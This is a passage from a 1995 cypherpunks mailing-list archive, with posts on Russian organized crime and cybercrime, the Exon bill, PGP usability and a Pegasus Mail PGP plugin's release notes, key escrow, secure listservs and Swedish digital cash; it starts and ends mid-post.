had valuable skills but were philosophically aligned with the old regime -- are absorbed into the Western EU fabric. Assimilation can be a very difficult process when attempts are made to integrate into the German economy those who choose _not_ to migrate especially if they are either unfit for, or opposed to their Liberators. Eliminating communism did not eliminate the communists. If Burwitz gets briefed on some history, I'm sure that many things will fall into context for him, and there will be a greater understanding of the enemy that he's teaching people to fight. It's always good to understand the scope of a problem before you attack it. That can only help with gaol achievement. > Organized crime is doubly damaging to the emerging nations, because > it undermines their economies, Kaciban said. Investors are naturally > reluctant to dump money into a nation if they believe there is > rampant corruption. I don't think that "investors" are ever reticent about exploiting opportunities -- if they are in fact welcome to, and not locked out. Unfortunately many opportunities are only extended by invitation to a select group of friends and not to an open field. This is true in Europe as well as anywhere in the world. Politicians as an example get access to certain opportunities -- Hillary Clinton's futures investments, or the Canadian equivalent, Alberta Premier Ralph Klein's wife's investment in Multi-Corp, as an example. At it's extreme, Kaciban is correct, this can lead to rampant corruption, something which is best prevented. But that is not the situation we are faced with in the East. In the East, there is an understanding that business is about relationships and understandings. Working relationships. Anyone that a firm would expect to have a contract with, isn't probably someone you should be sharing a bed with -- as they say -- in the first place. > Some teachings do not translate for the European > students. For example, there is no Russian RICO - the Racketeer > Influenced and Corrupt Organizations Act that is one of the strongest > American legal tools against organized crime. Some teachings also probably don't translate well for the American instructors. Cultural differences and expectations, as an example, which are born out of history. While the idea of a Russian RICO is interesting, it's not overly realistic. RICO is meant for a region that has established rules of engagement -- the breach of which calls for quick "rubber-hose" justice to ensure the system continues to function. RICO is best reserved, in that sense for a litigious America, to make sure that everyone remembers where their allegiance should lie. It has very little applicability in a chaotic system. Not only is there nothing to "preserve" -- but it truly begs the question of who'd administer a Russian RICO? You can't expect someone who's earning the equivalent of $50/month not to supplement their official "pay". > Eastern European crime syndicates tend not to be based in crime > families, instructors said. And organized crime in Russia and Ukraine > is so much a part of the society, that it's hard to stop it, said Amy > O'Neil, a State Department official not involved in the ILEA. Yep. This is a very serious problem. Some circles have suggested that the Russian nationalist Zhirinovsky is involved in some fashion in these syndicates; they've drawn a parallel to Sinn Fein. Others think that there is a utilization of KGB remnants (including those former communists which have now been _absorbed_ into the "unified" Germany, and continue to hold positions of power there). They believe that these sympathizers wish to restore and rebuild Mother Russia and the old social state. Some believe that these elements -- those that have a political / nationalistic allegiance -- are very friendly with the Eastern European crime syndicates. A reciprocal arrangement, if you will. One thing is clear. Whether or not any of the foregoing hold, or whether or not this syndicate's motivations are capitalistic or nationalistic -- their tentacles extend worldwide. Not only through a Moscow - St.Petersberg - Frankfurt - Brussels backbone, but even into the heartland of the United States. Hard to believe?? The FBI (I think) has identified about 220 "Eurasian" (mostly Russian) gangs operating in 17 U.S. cities in 14 states. And I believe they've identified 5,700 crime gangs in the former Soviet Union (which is up _significantly_ from the 785 identified in 1991). The Russian Ministry of Internal Affairs has estimated that gangs in the former USSR employ about 100,000 _full-time_ members and an estimated 3,000,000 part-timers. These gangs' tentacles even by FBI estimates extend worldwide. The FBI (again) said that Russian gangs are entrenched in 29 foreign countries and maintain contacts with nearly 100,000 criminal enterprises worldwide ranging from illegal alien smuggling rings, and drug gangs, through the child prostitution trade in China and Southeast Asia. If these enterprises are even somewhat loosely organized -- as Sinn Fein was -- then they probably have access to good crypto. Very good crypto. There can be no question of that. The belief that this syndicate is composed solely of thugs is actually contra-indicated. The ISSA (Information Systems Security Association) has suggested that these transnational gangs employ out of work or underemployed Russian scientists, mathematicians and computer experts, who earn as _little_ as $50 to $100 a month in their legitimate jobs because of inflation of Russia's currency. The ISSA, has written that these specialist scientists penetrate the Internet's global web of more than 60,000 computer networks. Radicals even suggest that this group is unique in having access to their own constellations and communications systems -- but I personally think that could only be civilian speculation. This group is well organized, well financed and has a breadth and depth of manpower that has never before been confronted. The idea that those Russians who now winter at St. Tropez and who have joined Monte Carlo cafe society must simply be very effective "capitalists" doesn't float. They are true natural talents who understand the financial system and its networks -- personal networks, financial networks, and silicon networks. The former Russian bankers who managed the countries Gold & Oil Sales, the ones who achieved understandings with De Beer's, the ones who managed Soviet international FOREX operations, and the ones who visited with Armand Hammer, and learned from him personally, probably had some sophistication in these matters. They've "dirtied" their hands with matters of Western finance, before. If they or their lieutenants have donated their talents to these enterprises, then Burwitz truly has his work cut out for him in educating and training at the new FBI School. He's not just facing some Caspian caviar smugglers. He's up against some of the finest talent available. > Both students and teachers said there was a remarkable similarity, > however, in the use of evidence and investigatory tools among the > countries. Eastern Europeans are very familiar with the use of DNA > testing, for example, to identify suspects, although they don't > always have the money to do it, Burwitzsaid."There are different > orders of laws between the U.S. and here," said a Czech student who > would identify himself only as Milan. "But essentially, we have the > same methods of investigation." A far worse scenario can come forward than Milan's. Let's suppose that the other side not only has complete familiarity with your arsenal of investigatory and evidentiary tools, but also has a superior knowledge of your own systems and their vulnerabilities, -- a knowledge that is superior to that you yourself possess. Let's assume that while you were building your systems, hard and soft systems, the other side has been studying them -- looking for holes and vulnerabilities, and quietly documenting them. Taking an action, no different than your very own study of their systems, actually. Now lets suppose that you destroy the other side's system, and cause economic collapse, social chaos, and national humiliation, while preserving your own system. An attempt at supremacy through "other means". Have you not invited a retaliatory attack? Some might suggest that you have ... Not that Eastern syndicate elements might wish to see the disease which has effected post-Soviet Russia propagate. A share in the taste of it. They're too busy tasting what was promised to them by the Voice of America and living the life of a model capitalist -- one of the characters from Dynasty. Groups such as the Congress of Russian Communities, and the decorated Afghan war hero, Gen. Alexander Lebed -- who Yeltsin asked to resign as commander of the 14th Russian Army following Lebed's criticism of the Kremlin -- certainly would have nothing to gain by retaliating in kind to the disease introduced into the Motherland. Striking at the state's head, clearly didn't solve this problem. The essential "talent" has simply re-organized into a new structure, one which is not under any central command or control hierarchy or authority. Simple chaotic self-interests organizing and emerging. Certainly upcoming Presidential Elections in June and November won't play a part in this. "I treat the word democracy with respect," fourty-five year-old Lebed told the newspaper Segodya recently. "But I am sure democracy will not be established within my lifetime. Our country is such that democracy will have to be built by authoritarian methods." Luckily, for all of us, President Boris Yeltsin is firmly in control. He has little to fear. Some people might be looking for a parallel to MacArthur / Truman, in this instance. But I personally wouldn't hang my hat on that hope. Lebed certainly wouldn't subscribe to Douglas MacArthur's statement after he was relieved of command in the Far East, in 1951, when he said, "I find in existence a new and heretofore unknown and dangerous concept that the members of our armed forces owe primary allegiance or loyalty to those who temporarily exercise the authority of the Executive Branch of the Government rather than to the country and its constitution which they swore to defend. No proposition could be more dangerous." The April/May ISSA Password had this to say. "Unless something is done by law enforcement and private security agencies on a global scale to deter these Russian criminals, they will be looting banks, corporations, and government agencies of billions of dollars -- without using guns or the traditional methods. Their modus operandi will be to rely solely on computer keyboards and the Internet. In an article published in the February 6, 1995, issue of the "Washington Times," international security expert and former Times editor-in-chief Arnaud de Borchgrave said: (sic) "Cyberspace detectives" report that financial thefts by Russian organized crime hackers on the Internet last year exceeded an estimated $5 Billion in the United States alone. Furthermore, he reports that about $300 million in untraceable computer transfers have vanished during the past two months (Jan/Feb 95) from banks and securities firms based on the East and West coasts of the U.S. I think in February (1995), the CIA and the National Security Agency (NSA) warned in a joint security report that, "The security of information systems and networks is the major security challenge of this decade and possibly the next century." Burwitz faces a challenge. If you face talent, information, money, and organization, while you can't even get your ducks lined up, if you can't maintain team discipline, then you might pretty well surrender. You've already ceded much of the high ground, as Burwitz can probably attest. To prevent the accusation of being a "red-baiter" perhaps, I might say that Mao Tse Tung, himself once noted: "Some people are intelligent in knowing themselves but stupid in knowing their opponents, and others the other way round; neither kind can solve the problem of learning and applying the laws of war." And to close, a return to de Borchgrave, who according to ISSA Password, wrote: "And it's not juvenile hackers who are committing these crimes. "Those doing it for the sheer pleasure of causing chaos on the net -- usually very young super-hackers -- have rapidly become the minority," one cyber detective told de Borchgrave. "Transnational crime gangs operating on several continents at almost the speed of light are now the main problems." Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From jburrell at crl.com Wed Dec 6 20:51:12 1995 From: jburrell at crl.com (Jason Burrell) Date: Wed, 6 Dec 95 20:51:12 PST Subject: Responding to Exon -- technology is not enough In-Reply-To: Message-ID: [This document was Exonized at The Exon-Hyde Center for Thought Cleansing.] On Wed, 6 Dec 1995, Bill Humphries wrote: > Fine for the tiny subset of Net users who understand crypto enough to use > it on a daily basis. I'm not one of people either. This crypto isn't user > friendly stuff. Before you propose such as solution, better make sure > people can use this stuff. You're right here, definately. While I'm not volunteering, I think something could be written, such as an encrypted UUCP transfer system, and a better premail. PGP is reasonably user friendly, if you have any kind of memory at all. It isn't, of course, user friendly if you have to save your message to a file, shell, encrypt it, exit the shell, load it back in, and send it. I think that there is the major problem with PGP. I *know* that kind of thing is a problem with chaining anon mailers, unless you have installed an application such as Premail. I think that we'll eventually see applications such as Eudora pop up with PGP support, directly or indirectly. > >Anyone wish to comment on the prospect of a double blind server, set > >outside U.S. borders, that can act as an interface to the rest of the > >world, perhaps encrypting or stego'ing the data transfered between it and > >the user? Basically, an anonymous remailer that acts as a cross between > >an NNTP, POP3, and SMTP servers. > > How are you going to pitch this technology to all the people with AOL and > Microsoft Network accounts who barely understand the net? These are the > people who need exposure to all the uncensored expression they can get. I was thinking more along the lines of an offline message packet that the server creates, encrypts, chains through anon mailers with an response block, and sends to you. You get it, run it through a filter, run your offline reader, such as Yarn, write your replies, run another program to get an encrypted, reply-blocked, ready to send packet, and drop it right into the SMTP port. I don't know if the AOL and MSN software would even allow this without difficulty, as I haven't seen it. I just used it as an example, though. I'm sure there are much better ideas out there. > Instead of figuring out how to build a new treehouse that excludes Exon and > Hyde, how about fighting the damned bill in the courts? Here's a chain of events: 1) Congress gets their wish, and it all passes. 2) President signs into law. 3) ISPs: a) Shutdown, which isn't really likely, b) Severely restrict service, or c) Tell the government where to shove it (and watch themselves promptly prosecuted). After one or two ISPs are busted, the rest will "fall in line." 4) Someone gets caught writing "" in E-MAIL or on USENET, or committing some other form of thought-crime, and is prosecuted. 5) While this person is fighting his or her impending exonization and cleansing of dirty thoughts, the rest of us have our free speech severely restricted. Would I be wrong in saying that it would take a long time, and a lot of money to fight this up to the Supreme Court? Then we risk the Supreme Court ruling in favor of Congress, however unlikely that may seem. The S.C. could just as easily tell us to "exon off" to keep the world safe for mentally impaired children that, while smart enough to operate a computer and go looking for pornography, are damaged by it and/or the word "exon." From wb8foz at nrk.com Wed Dec 6 21:21:14 1995 From: wb8foz at nrk.com (David Lesher) Date: Wed, 6 Dec 95 21:21:14 PST Subject: [FYI] FBI Training Eastern European Police In-Reply-To: <199512070422.UAA22589@jobe.shell.portal.com> Message-ID: <199512070516.AAA02188@nrk.com> > > FBI School Teaches New Tricks to Old Enemies I've heard stories that several of these programs had unexpected problems. To wit -- some of the students were showing up from the third world with severe medical problems; expensive ones, including the obvious -- AIDS. Result -- Lots of flack back & forth from field to TPTB. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From craig at passport.ca Wed Dec 6 21:22:11 1995 From: craig at passport.ca (Craig Hubley) Date: Wed, 6 Dec 95 21:22:11 PST Subject: secure listservs? Message-ID: Looking for some secure listserv software, preferably something that will automatically generate purpose-specific PGP keys for each user and one for the listserv. Each user encodes mail for the list with the list's public key, signing it with their own private key (either the purpose specific one, or their regular key). Each user receives mail from the listserv encoded with the corresponding public key. That way each user has a choice of using their published key (for convenience) or their purpose- specific key, possibly in conjunction with an anonymous remailer, to ensure the segmentation of these communications from others that they may engage in. Anyone seen/built anything like this ? -- Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the net mailto:craig at hubley.com 416-778-6136 416-778-1965 FAX Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5 From jimbell at pacifier.com Wed Dec 6 21:36:55 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 6 Dec 95 21:36:55 PST Subject: Solution for US/Foreign Software? Message-ID: At 06:28 PM 12/6/95 -0600, you wrote: > >Bill Stewart writes: > > I had interpreted the suggestion differently - rather than a system with > > user-accessible crypto hooks, the manufacturer could ship a binary patch > > upgrade for US customers to install. The internal design would presumably > > have crypto hooks (i.e. subroutine calls); they can't ban that. > >No, they can't *ban* it, but there's no reason to suspect that they >won't revoke the export license after the scheme becomes clear. And >of course the patch itself would not be exportable. If there's a >"wink wink nudge nudge" implication that the patch would make its way >overseas, I don't understand why that's really any more likely than >the US-only version getting out. It isn't that it's "more" likely. It's probably JUST AS likely. But remember, the goal is to allow the US company to actually MAKE MONEY, not to bootleg its products. The system I've described would be intended to allow a manufacturer to continue to sell its exportable product legally. From jamesd at echeque.com Wed Dec 6 22:28:45 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 6 Dec 95 22:28:45 PST Subject: Netscape gives in to key escrow Message-ID: <199512070629.WAA07401@blob.best.net> At 02:14 AM 12/6/95 -0800, Jeff Weinstein wrote: > Our representative at the NIST meeting said [GAK is evil] there today. > It should be up on the web site in a few days when he gets > back from DC. Dang, I was just working on my "death to netscape" page before I started reading my mail. I had done the text, and was going to start stripping background out of the dirty pictures, so that my server would not drop to its knees. The text is visible when viewed in netscape, but the pictures are not. Should have done the fun part first. Let us know when the position is put on the web. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From ddt at lsd.com Wed Dec 6 23:47:12 1995 From: ddt at lsd.com (Dave Del Torto) Date: Wed, 6 Dec 95 23:47:12 PST Subject: Persona PCMCIA URL? Message-ID: Does anyone have a URL for data sheets on the Persona cards? From enzo at ima.com Thu Dec 7 02:06:11 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Thu, 7 Dec 95 02:06:11 PST Subject: FW: websurfer 4.6 (fwd) In-Reply-To: Message-ID: On Sat, 2 Dec 1995, Michael Froomkin wrote: > so much for compatibility....guess I'm sticking with netscape for now. These guys at Netmanage's support seem to confuse Trumpet's version number with the Winsock version... Trumpet 2.0b (as, AFAIK, any other Winsock package presently available) is Winsock 1.1 compliant. By the way, I read in the "about/more" screen of Websurfer 4.6 (that works with my Win95 TCP/IP stack): -------- 8< ------------------- Cryptography developed and provided by Cylink Corporation http://www.cylink.com Portions copyrighted 1995 -------- 8< ------------------- and on the right side of the URL field a little (open) lock icon is shown. However, I haven't found anywhere references to secure connections. Does anybody know more about it? For sure, "https:" URL are not recognized. Enzo ______________________________________________________________________ > > A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) > Associate Professor of Law | > U. Miami School of Law | froomkin at law.miami.edu > P.O. Box 248087 | http://www.law.miami.edu/~froomkin > Coral Gables, FL 33124 USA | It's warm here. > > ---------- Forwarded message ---------- > Date: Fri, 1 Dec 95 16:49:34 PST > >From: Netmanage Technical Support > To: Michael Froomkin > Subject: FW: websurfer 4.6 > > > Hello, > > Thank you for emailing NetManage Technical Support. WebSurfer 4.6 was > designed to work on Winsock 1.1 compliant systems. Since you are > running Winsock version 2.0 this may be the reason for the > application not working. We will report this to Engineering so > hopefully in a future release WebSurfer might be able to support > this new Winsock version. > > Thank you for considering Chameleon WebSurfer, > > Support at netmange.com > == > [earlier, I had said:] > > won't start on my pentium 100 w/ 20Mb running qemm 7.04, windows 3.11, > winsock 2.0 rev B on a novell 3.x LAN. > > Netscape runs fine. > > This might help: > Trumpet Winsock Version 2.0 Revision B > Copyright (c) 1993,1994 by Peter R. Tattam > All Rights Reserved. > THIS IS AN UNREGISTERED SHAREWARE VERSION FOR EVALUATION ONLY. > Ethernet address = 00:00:F4:D2:64:D3 > WINPKT packet driver located on vector $66 > IP buffers = 32 > Performing bootp...Bootp successful > My IP = 129.171.188.92 netmask = 255.255.255.0 gateway = 129.171.188.1 > Task WEBSURF(22E7) did not call WSACleanup. > Task WEBSURF(38EF) did not call WSACleanup. > > > -----------------End of Original Message----------------- > > If responding to a previous message please include the original for our reference. To ensure a faster reply be sure to reply to 'support at netmanage.com' and not to individual sender of > messages. > > -- /\ > **********/@@\ ********************************* > \__/ NetManage Inc. > W AA W Home of Chameleon TCPIP for Windows > |__AYA__/ TCPIP Apps for Windows and NT > AXXV > VXXV > W VUV W Technical Support (408)973-8181 > |_/ V \_/ __ Fax (408)973-8272 > \ [_ \ > \_____/ MIME enclosures are OK > gopher server: gopher.netmanage.com > www: http:/www.netmanage.com > > For a list of current NetManage products use WebSurfer and go to: http://www.netmanage.com:80/netmanage/products/upgrade.html > > Serendipity > 11/20/95 > 10:36:42 AM > > This message was sent by Chameleon > From REES at rmcs.cranfield.ac.uk Thu Dec 7 03:33:15 1995 From: REES at rmcs.cranfield.ac.uk (REES at rmcs.cranfield.ac.uk) Date: Thu, 7 Dec 95 03:33:15 PST Subject: Plea for information Message-ID: <951207113222.88b6@rmcs.cranfield.ac.uk> I would be interested in learning more about the politics and mathematics of cryptography, but my site does not have access to a newsreader. As I am new to the Net, I am not aware of any acceptable way around this, which will allow me to read and contribute to the cypherpunk and related newsgroups - please can you help me out on this matter. Also, I would like to know how best to understand cryptography - I have a textbook on the basic mathematical concepts underlying the techniques but it is too advanced for my current knowledge in this field (A-level - ie. end of high school), please can you suggest a good starting place for me. Thanks in advance for your assistance, Daniel Rees From asgaard at sos.sll.se Thu Dec 7 05:08:10 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Thu, 7 Dec 95 05:08:10 PST Subject: 1)Age etc CA 2)Swedish Digicash In-Reply-To: Message-ID: On Wed, 6 Dec 1995, Timothy C. May wrote: > For example, Sameer's c2.org could issue accounts to people who can prove > they are over 18 (notarized copies of birth certif., passport, etc.). > Sameer's system would then have a credential saying "this account name is > over 18." Isn't it in the coming that a federal agency, such as the Post Office, will become the primary issuer of age-including 'physical identity' certificates, based on such notarized copies? And store signed public keys for everybody? It certainly is here, and the Swedish Post Office (=Posten, with PostNet) wants to do it all. Perhaps this is tolerable, with the condition that only the 'identity' has access to the private key. Posten has yet not come out in public with any details of their proposed system, such as key-pair generation. Also, I can read in today's paper (in an article flanked by a picture of David Chaum, and mentioning Mark Twain - not by name but as 'an American bank') that EU has given one of three 'IT prizes' to Digicash and that Posten has licensed Digicash and plans to open a mint/bank (Posten already is closely connected to a bank) dealing in Swedish crowns. (This is not news but things seem to be moving right now.) Some (but slight) mention of laundering, of course. It's supposed to come about in 'the beginning of next year'. I wonder how exchanges crowns/dollars will be managed. Perhaps one will have to do it oneself for some time. If Posten doesn't want to deal with it - at least for a start - I'm sure Mark Twain will echange crowns to dollars for a fee, if only Posten's system will be compatible. Lots of questions still in limbo, though. Mats From klong at phoenix.net Thu Dec 7 05:26:14 1995 From: klong at phoenix.net (Siberia) Date: Thu, 7 Dec 95 05:26:14 PST Subject: (Fwd) General release of Open Encryptor interface for PGP Message-ID: <199512071327.HAA06167@phoenix.net> ------- Forwarded Message Follows ------- Priority: normal Date: Fri, 8 Dec 1995 00:08:30 +1200 Reply-to: Pegasus Mail Announcments From: John Navas Organization: The Navas Group, Dublin, CA, USA Subject: General release of Open Encryptor interface for PGP To: Multiple recipients of list PM-NEWS -----BEGIN PGP SIGNED MESSAGE----- Release 1.0 of my Open Encryptor interface for PGP has been posted on my anonymous FTP server PGP information is available at http://www.mantis.co.uk/pgp/pgp.html The MIT distribution of PGP is at ftp://net-dist.mit.edu:/pub/PGP/ ViaCrypt (commercial version of PGP) is at http://www.viacrypt.com/ The International PGP Home Page is at http://www.ifi.uio.no/~staalesc/PGP/ Release notes for PGP Open Encryptor Interface version 1.0: 1. Only public key cryptography is supported in this release, NOT conventional cryptography. 2. Basic Key Management functions are implemented: a. To add a public key block contained in a message to your Key Ring, either Open or select the message before invoking Key Management. (If a public key block is placed in a digitally signed and/or encrypted message, it will not be recognized automatically by this interface.) You can also invoke Key Management and paste a public key block into the dialog from the Windows Clipboard (which does of course work with a signed and/or encrypted message). b. You can check to see if a given email address is on your Key Ring -- just paste the email address (without the name) into the dialog box control. No other Key Management functions are implemented at this time. 3. Both digital signing and signature verification are implemented: a. If a secret pass phrase is needed (and not provided in the PGPPASS environment variable), it MUST be provided each time in the WinPMail Password field. b. Please note that signature verification is a strictly *manual* process -- you must expliticly use the WinPMail menu. This is a characteristic of WinPMail, NOT this interface. 4. When encrypting: a. The recipient email address (e.g., jnavas at navasgrp.com) will normally select the appropriate public key automatically, but it may be overridden with an entry in the WinPMail Password field. b. Your recipient may need to add also-known-as entries to his/her public key to ensure that you match on various forms of email addresses (e.g., also known as jnavas at mailhost.aimnet.com). c. The WinPMail Password will NOT be used for encryption of a digitally signed message, since the Password is then reserved for the secret pass phrase (whether one is needed or not). 5. If encryption or signing fails (e.g., because the recipient is not on your key ring, or because your secret pass phrase was incorrect), an empty message will be sent. This is a characteristic of WinPMail, NOT this interface. 6. Copies to self of encrypted and/or signed messages are NOT encrypted and/or signed. This is a characteristic of WinPMail, NOT this interface. (If you want an encrypted and/or signed copy, BCC yourself.) 7. It is normally NOT possible for you to decrypt message that you have encrypted for someone else (since you do not have that person's secret key). However, you can establish a master decryption key by setting the PGPJNKEY environment variable to a string needed to select the appropriate public key (yours or not). TEST FOR PROPER OPERATION (BY DECRYPTING A MESSAGE ENCRYPTED FOR SOMEONE ELSE) BEFORE YOU DEPEND ON IT! It may be a good idea to add an also-known-as alias just for this purpose. 8. The Cancel button does not work on the Decryption dialog box. This is a characteristic of WinPMail, NOT this interface. 9. When you do a Find on a folder, WinPMail puts up the Decryption key dialog for every encrypted message, even when you are only searching headers, which can make the process painful. This is a characteristic of WinPMail, NOT this interface. 10. Attachments to encrypted messages are NOT supported. (Outgoing attachments to encrypted messages are NOT encrypted, and incoming binary attachments are corrupted.) This is a characteristic of WinPMail, NOT this interface. 11. Windows 3.10, Windows for Workgroups 3.11, and Windows 95 are supported. Windows NT and OS/2 have NOT been tested and are NOT currently supported. USE THEM AT YOUR OWN RISK. 12. MIT PGP 2.6.2 is supported in this release. Other versions of PGP have NOT been tested and are NOT currently supported. ViaCrypt PGP has NOT been tested for this release, but is expected to be supported in a subsequent release. USE THEM AT YOUR OWN RISK. 13. Reassembly and decryption of multiple-part PGP messages is NOT supported. 14. PGP messages sent by other WinPMail Open Encryptor PGP interfaces may not trigger this interface. (Other PGP sources should not be a problem.) This is a characteristic of WinPMail, NOT this interface. To install the PGP Open Encryptor Interface: 1. UnZIP in a subdirectory of FORMS called PGPJN (e.g., \PMAIL\FORMS\PGPJN). 2. Copy the PGPJNP.FFF file up to your WinPMail directory (e.g., \PMAIL). 3. Make sure that PGP is installed correctly, and that the PGPPATH environment variable is set correctly. (If PGPPATH is set, PGP does not need to be in your PATH.) 4. Encrypt and send a message to yourself to test operation. John Navas -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMbC7O5ya4p8vxAtAQHO7wH/atOJoEbrUX2G/Zzr3jZCvblQZXBWzlv6 KTNraPxaui8jtw83U+pZYWV/jNVJ48Fw4Fy6XeQrtdzXJsi0tKJZtg== =jZvU -----END PGP SIGNATURE----- From jhupp at novellnet.gensys.com Thu Dec 7 05:33:57 1995 From: jhupp at novellnet.gensys.com (Jeff Hupp) Date: Thu, 7 Dec 95 05:33:57 PST Subject: (Fwd) General release of Open Encryptor interface for PGP Message-ID: <309290F7177@Novellnet.Gensys.com> I believe this may be of intrest to those on this list. Pegasus is available at Enjoy. ------- Forwarded Message Follows ------- Priority: normal Date: Fri, 8 Dec 1995 00:08:30 +1200 Reply-to: Pegasus Mail Announcments From: John Navas Organization: The Navas Group, Dublin, CA, USA Subject: General release of Open Encryptor interface for PGP To: Multiple recipients of list PM-NEWS -----BEGIN PGP SIGNED MESSAGE----- Release 1.0 of my Open Encryptor interface for PGP has been posted on my anonymous FTP server PGP information is available at http://www.mantis.co.uk/pgp/pgp.html The MIT distribution of PGP is at ftp://net-dist.mit.edu:/pub/PGP/ ViaCrypt (commercial version of PGP) is at http://www.viacrypt.com/ The International PGP Home Page is at http://www.ifi.uio.no/~staalesc/PGP/ Release notes for PGP Open Encryptor Interface version 1.0: 1. Only public key cryptography is supported in this release, NOT conventional cryptography. 2. Basic Key Management functions are implemented: a. To add a public key block contained in a message to your Key Ring, either Open or select the message before invoking Key Management. (If a public key block is placed in a digitally signed and/or encrypted message, it will not be recognized automatically by this interface.) You can also invoke Key Management and paste a public key block into the dialog from the Windows Clipboard (which does of course work with a signed and/or encrypted message). b. You can check to see if a given email address is on your Key Ring -- just paste the email address (without the name) into the dialog box control. No other Key Management functions are implemented at this time. 3. Both digital signing and signature verification are implemented: a. If a secret pass phrase is needed (and not provided in the PGPPASS environment variable), it MUST be provided each time in the WinPMail Password field. b. Please note that signature verification is a strictly *manual* process -- you must expliticly use the WinPMail menu. This is a characteristic of WinPMail, NOT this interface. 4. When encrypting: a. The recipient email address (e.g., jnavas at navasgrp.com) will normally select the appropriate public key automatically, but it may be overridden with an entry in the WinPMail Password field. b. Your recipient may need to add also-known-as entries to his/her public key to ensure that you match on various forms of email addresses (e.g., also known as jnavas at mailhost.aimnet.com). c. The WinPMail Password will NOT be used for encryption of a digitally signed message, since the Password is then reserved for the secret pass phrase (whether one is needed or not). 5. If encryption or signing fails (e.g., because the recipient is not on your key ring, or because your secret pass phrase was incorrect), an empty message will be sent. This is a characteristic of WinPMail, NOT this interface. 6. Copies to self of encrypted and/or signed messages are NOT encrypted and/or signed. This is a characteristic of WinPMail, NOT this interface. (If you want an encrypted and/or signed copy, BCC yourself.) 7. It is normally NOT possible for you to decrypt message that you have encrypted for someone else (since you do not have that person's secret key). However, you can establish a master decryption key by setting the PGPJNKEY environment variable to a string needed to select the appropriate public key (yours or not). TEST FOR PROPER OPERATION (BY DECRYPTING A MESSAGE ENCRYPTED FOR SOMEONE ELSE) BEFORE YOU DEPEND ON IT! It may be a good idea to add an also-known-as alias just for this purpose. 8. The Cancel button does not work on the Decryption dialog box. This is a characteristic of WinPMail, NOT this interface. 9. When you do a Find on a folder, WinPMail puts up the Decryption key dialog for every encrypted message, even when you are only searching headers, which can make the process painful. This is a characteristic of WinPMail, NOT this interface. 10. Attachments to encrypted messages are NOT supported. (Outgoing attachments to encrypted messages are NOT encrypted, and incoming binary attachments are corrupted.) This is a characteristic of WinPMail, NOT this interface. 11. Windows 3.10, Windows for Workgroups 3.11, and Windows 95 are supported. Windows NT and OS/2 have NOT been tested and are NOT currently supported. USE THEM AT YOUR OWN RISK. 12. MIT PGP 2.6.2 is supported in this release. Other versions of PGP have NOT been tested and are NOT currently supported. ViaCrypt PGP has NOT been tested for this release, but is expected to be supported in a subsequent release. USE THEM AT YOUR OWN RISK. 13. Reassembly and decryption of multiple-part PGP messages is NOT supported. 14. PGP messages sent by other WinPMail Open Encryptor PGP interfaces may not trigger this interface. (Other PGP sources should not be a problem.) This is a characteristic of WinPMail, NOT this interface. To install the PGP Open Encryptor Interface: 1. UnZIP in a subdirectory of FORMS called PGPJN (e.g., \PMAIL\FORMS\PGPJN). 2. Copy the PGPJNP.FFF file up to your WinPMail directory (e.g., \PMAIL). 3. Make sure that PGP is installed correctly, and that the PGPPATH environment variable is set correctly. (If PGPPATH is set, PGP does not need to be in your PATH.) 4. Encrypt and send a message to yourself to test operation. John Navas -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMbC7O5ya4p8vxAtAQHO7wH/atOJoEbrUX2G/Zzr3jZCvblQZXBWzlv6 KTNraPxaui8jtw83U+pZYWV/jNVJ48Fw4Fy6XeQrtdzXJsi0tKJZtg== =jZvU -----END PGP SIGNATURE----- -- JHupp at gensys.com |For PGP Public Key: http://gensys.com |finger jhupp at gensys.com Expertise in one field does not carry over into other fields. But experts often think so. The narrower their field of knowledge the more likely they are to think so. From DMiskell at envirolink.org Thu Dec 7 05:36:58 1995 From: DMiskell at envirolink.org (Daniel Miskell) Date: Thu, 7 Dec 95 05:36:58 PST Subject: GAK Message-ID: <9512071337.AA02622@envirolink.org> Scott Binkley writes: >I heard a while back about being able to "split" up a PGP key. What >about >splitting up the key into many parts, and giving them out to multiple >INDEPENDANT >agencies. ie: One piece goes to the FBI, one to the NSA, one to some >other committee, and >so on. That way, no goverment body could just tap your conversations >without getting >approval from others, and gaining the pieces of your key. > >just a thought Why give them your key in the first place? Personally, I wouldnt trust any government agency with even a fraction of my key - what makes you think they arent *allready* working together? Then you have effectively given your key, and all of your private mail, to the government, no restrictions. --- _________________________________ *!Cheese Doctrine:!* Though cultured over time, and aged to perfection, one must not yield to produce mold. One must also not belittle themselves by conforming to the "whiz", but melt over the unprocessed ideas of Ghuda. _________________________________ From DMiskell at envirolink.org Thu Dec 7 05:47:33 1995 From: DMiskell at envirolink.org (Daniel Miskell) Date: Thu, 7 Dec 95 05:47:33 PST Subject: Responding to Exon -- technology is not enough Message-ID: <9512071348.AA02951@envirolink.org> Bill Humphries writes: >Instead of figuring out how to build a new treehouse that excludes Exon and >Hyde, how about fighting the damned bill in the courts? Possibly because a) it is allready being faught, and b) court battles cost money which most folks dont have. If people are unfamilliar with encryptation, they should do a web search and find out what they can, then use it. What you are saying (as far as encryptation not being an answer because so few know how to use it) feels like "lets not use a gun to defend our home from intrusion because so few know how to handle them. You dont just assume that bewcause you dont know how that you give up. You learn how. That is how i found this list - because i did a little running around. Munster --- _________________________________ *!Cheese Doctrine:!* Though cultured over time, and aged to perfection, one must not yield to produce mold. One must also not belittle themselves by conforming to the "whiz", but melt over the unprocessed ideas of Ghuda. _________________________________ From nobody at REPLAY.COM Thu Dec 7 06:39:07 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 7 Dec 95 06:39:07 PST Subject: Prayers Pay Message-ID: <199512071440.PAA02476@utopia.hacktic.nl> The raiders hit early this morning, banging the 